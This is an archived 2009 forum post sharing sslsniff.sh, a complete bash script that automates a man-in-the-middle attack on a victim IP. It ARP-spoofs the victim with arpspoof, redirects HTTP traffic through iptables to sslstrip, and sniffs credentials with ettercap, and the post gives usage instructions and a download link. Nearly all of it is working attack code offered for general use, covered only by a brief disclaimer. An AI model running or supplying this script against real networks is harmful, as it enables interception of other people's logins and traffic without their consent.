Remote Exploit Forums

Go Back   Remote Exploit Forums > Specialist Topics > Programming
Reload this Page sslsniff.sh


Programming A place for our community to discuss their own security related coding projects.

Reply
 
LinkBack Thread Tools Display Modes
  #1 (permalink)  
Old 11-14-2009, 01:47 PM
thims's Avatar
Junior Member
  
Join Date: Nov 2009
Location: /dev/null
Posts: 5
Default sslsniff.sh
@admins if you feel this is a duplicate post let me know and delete it I will move back to where this originated, but seeing as revisions, etc. I didnt want to hijack the original post.

This script is not intended for illegitimate uses, I am in no way responsible for the way you use this, or the decisions you make.

This is a script I wrote for SSL sniffing.
ToDO:
- ensure ip_forward is always set

General Usage:
./sslsniff.sh -v <ip of target> -g <ip of gateway>
-v and -g are the only required flags, the rest are optional.
if -s is not specified sslstrip defaults to port 10000
-h for help

Download: mediafire.com/?nmtz2tjvuyj
Code:
Code:
#!/bin/bash
#
# Synopsis:	A program to sniff traffic in an SSL connection
# Author:		thims (thims DOT local AT gmail DOT com)
# Version:	0.3
# Date:			20091107
# Comments:	
#		ToDO:


# leave blank simply here for coding style
victim=
gateway=
sslPort=10000
etterConf=/etc/etter.conf

# print help
function help() {
cat << EOF
Usage: $0 [args] host
    -h, --help     -  Print this help and exit
    -i. --iface    -  Interface to use
    -e, --etconf   -  Location of etter.conf on the filesystem
    -v, --victim   -  IP address of desired host
    -g, --gateway  -  IP address of network gateway
    -s, --sslport  -  Desired port for sslstrip
EOF
}

# echo supplied argument and die
function die() {
	if [ -n "$1" ] ;then
		echo "$1"
	fi
	exit 1
}

# nohup wrapper to check if specified program will execute correctly
function noHup() {
	cmd="$1"
	nohup $cmd > /dev/null &> /dev/null &
	sleep 5
	# here simply to handle sslstrip because it is ran by python it throws off pidof
	if [ $(echo "$cmd" | awk -F" " '{print $1}') == "sslstrip" ] ;then
		pid=$(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}')
	else
		pid=$(pidof $(echo "$1" | awk -F" " '{print $1}'))
	fi

	if [ -z "$pid" ] ;then
		return 1
	else
		return 0
	fi
}

# poison the arp
function spoofMac() {
	echo -n "Poisoning the victim...."
	noHup "arpspoof "$iface" -t "$victim" "$gateway""
	if [ $? -gt 0 ] ;then
		die "Error: could not initiate arpspoof. Dieing..."
	fi
	echo $(pidof arpspoof) > /var/run/sslsniff.arpspoof.run
	echo "Ok"
}

# intercept the SSL cert
function sslInit() {
	echo -n "Setting up SSL intercept...."
	echo 1 > /proc/sys/net/ipv4/ip_forward
	# ensure that ip_forward is set
	while [ $(cat /proc/sys/net/ipv4/ip_forward) == 0 ]
	do
		echo 1 > /proc/sys/net/ipv4/ip_forward
	done

	iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"
	noHup "sslstrip -a -f -k -l "$sslPort""
	if [ $? -gt 0 ] ;then
		die "Error: could not initiate sslstrip. Dieing..."
	fi
	echo $(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}') > /var/run/sslsniff.sslstrip.run
	echo "Ok"
}

# capture the responses
function capture() {
	# edit ettercap.conf
	for linNum in $(cat "$etterConf" | grep -in redir | grep iptables | awk -F: '{print $1}')
	do
		sed -i $linNum's/#//' "$etterConf"
	done

	echo -n "Starting to sniff...."
	ettercap -T -q "$iface"
}

# clean up enviroment
function cleanUp() {
	echo "Cleaning up...."
	echo -n "Closing SSL proxy...."
	kill $(cat /var/run/sslsniff.sslstrip.run)
	rm /var/run/sslsniff.sslstrip.run
	echo "Ok"
	echo -n "Unpoisoning the victim...."
	kill  -n 2 $(cat /var/run/sslsniff.arpspoof.run)
	rm /var/run/sslsniff.arpspoof.run
	echo "Ok"
	echo -n "Removing iptables rule and ip_forwarding...."
	iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"	
	echo 0 > /proc/sys/net/ipv4/ip_forward
	echo "Ok"
	
	# return etter.conf to the state it was found in 
	echo -n "Returning etter.conf to the configuration we found it with...."
	for linNum in $(cat "$etterConf" | grep -in redir | grep iptables | awk -F: '{print $1}')
	do
		sed -i $linNum's/^/#/' "$etterConf"
	done
	echo "Ok"
	echo "Have a nice day!"
}

# initialize the whole shebang
function initialize() {
  if [ -z "$victim" ] || [ -z "$gateway" ] ;then
    help
    echo
    die "Error: a syntactical one"
	else
		echo "Enviroment details:"
		echo "    Victim:         " "$victim" "  Ok!"
		echo "    Gateway/Router: " "$gateway" "  OK!"
		echo "    Interface:      " "$iface" "  OK!"
		echo "    SSLStrip port:  "	"$sslPort" "  OK!"

    spoofMac
    sslInit
    capture
		cleanUp
  fi  
}


# some CLI ARGS?
while [ $# -gt 0 ]
do
	case "$1" in
		"-h"|"--help")
			help
			die
		;;
		"-v"|"--victim")
			victim="$2"
		;;
		"-g"|"--gw")
			gateway="$2"
		;;
		"-s"|"--sslport")
			sslPort="$2"
		;;
		"-i"|"--iface")
			if [ $(ifconfig "$2" &> /dev/null; echo $?) == 1 ] ;then
				die "Error: interface "$2" does not exist!"
			else
				iface="-i $2"
			fi
		;;
		"-e"|"--etconf")
			if [ ! -e "$2" ] ;then
				die "Error: specified ettercap conf does not exist!"
			else
				etterConf="$2"
			fi
		;;
		'')
			help
			echo
			die "Error: a syntactical one"
		;;
		-*)
			help
			echo
			die "Error: a syntactical one"
		;;
	esac
	shift
done


# main loop
initialize
All suggestions, comments, feedback, etc are more then welcome, I would love to hear what you thoughts are.

Also I take suggestions/requests for scripts.
Reply With Quote
Reply

Bookmarks

« Previous Thread | Next Thread »
Thread Tools
Display Modes
Linear Mode Linear Mode

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On


All times are GMT. The time now is 12:56 AM.

Remote Exploit Forums - Archive - Top

Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.
Search Engine Optimization by vBSEO 3.3.2